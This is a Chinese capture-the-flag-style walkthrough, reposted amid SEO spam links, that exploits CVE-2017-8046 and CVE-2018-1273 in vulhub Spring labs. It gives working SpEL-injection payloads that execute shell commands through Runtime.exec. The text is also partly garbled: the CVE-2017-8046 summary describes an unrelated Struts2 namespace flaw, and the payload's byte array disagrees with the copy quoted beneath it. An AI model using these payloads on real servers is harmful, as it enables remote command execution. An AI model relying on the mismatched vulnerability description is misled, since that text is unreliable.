当前位置: 首页 > wzjs >正文

郑州seo关键词推广苏州排名搜索优化

郑州seo关键词推广,苏州排名搜索优化,外贸网店系统,王烨烨一、CVE-2017-8046-Spring Data Rest 远程命令执行命令 漏洞环境 vulhub靶场 /spring/CVE-2017-8046 漏洞简介 漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞…

一、CVE-2017-8046-Spring Data Rest 远程命令执行命令

漏洞环境

vulhub靶场 /spring/CVE-2017-8046

漏洞简介

漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞的发⽣。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使⽤通配符namespace,从⽽导致远程代码执⾏漏洞的发⽣。

第一步:开启靶场,访问漏洞页面

#URL
http://47.103.81.25:8080/customers/1
第二步:在本页面抓包,构造payload

#请求方式
先右键修改请求方式改为POST,再直接将POST改为PATCH#Content-Typ
application/json-patch+json#发送数据
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,101}))/lastname", "value": "vulhub" }]#数据中
new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115} 表示的命令 touch /tmp/success ⾥⾯的数字是ascii码
第三步:在云服务器进入此靶场容器的终端

#命令docker ps查看容器id
77e610fd0066#进入终端
docker exec -it 77e610fd0066 /bin/bash
第四步:打开bp,发送后,返回云服务器切换到/tmp目录,查看文件,成功上传

二、CVE-2018-1273-Spring代码执行漏洞

漏洞简介

Spring Data 是⼀个⽤于简化数据库访问,并⽀持云服务的开源框架,Spring Data Commons 是 Spring Data下所有⼦项⽬共享的基础框架。Spring Data Commons 在 2.0.5 及以前版本中,存在⼀处 SpEL 表达式注⼊漏洞,攻击者可以注⼊恶意 SpEL 表达式以执⾏任意命令。

第一步:访问靶场地址
#URL
http://47.103.81.25:8080/users
第二步:填写注册信息,bp抓包,发送到重放器

第三步:删除提交的内容,构造payload

#构造payload
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/iyu")]=&password=&repeatedPassword=
第四步:在云服务器进入此靶场容器的终端,查看是否成功上传文件

#命令docker ps查看容器id
769e92400e15#进入终端
docker exec -it 769e92400e15 /bin/bash#查看是否成功上传
ls /tmp

                                                                                                                                FROM  IYU_

http://www.dtcms.com/wzjs/446287.html

相关文章:

  • 大连网站优化技术自媒体运营
  • 17网站一起做网店浙江百度seo工具
  • 商业网站制作站长资源平台
  • 网站大数据怎么做最近三天发生的重要新闻
  • 做app网站建设怎么卸载windows优化大师
  • 杭州网站建设公司推荐网站推广 方法
  • 如何做招聘网站媒体代发网站
  • 模板和网站可以分开吗内江seo
  • 做民宿哪家网站最好百度网登录入口
  • 合作公司做网站google搜索优化
  • 做网站用虚拟主机好不好湖南关键词网络科技有限公司
  • 南京网站制作价格网络公司排行榜
  • 手机版网站如何做图片滚动最近新闻今日头条
  • 长春房产网签查询如何进行网站性能优化?
  • 自己做装修网站网络营销做得好的品牌
  • 湖南网站建设公司速来磐石网络国内搜索网站排名
  • 管庄地区网站建设seo技术最新黑帽
  • 网站制作的收费天津seo公司
  • 合肥霍山路网站建设郑州seo公司哪家好
  • 怎么找网站建设公司seo专员工作容易学吗
  • 西安网站设计制作一般多少钱一周热点新闻
  • 官网的网站建设公司网站引流推广
  • 龙华三网合一网站建设直通车怎么开才有效果
  • 长春做网站优化的公司宜昌网站建设公司
  • 做国外网站衣服码数要怎么写有什么好的网站吗
  • 外贸局合并到哪个局培训seo
  • 网站utf8乱码seo应该如何做
  • 做网站_你的出路在哪里营销策划与运营公司
  • 在线做爰直播网站百度搜索排名优化哪家好
  • 企业怎么在网站上做宣传seo网站推广费用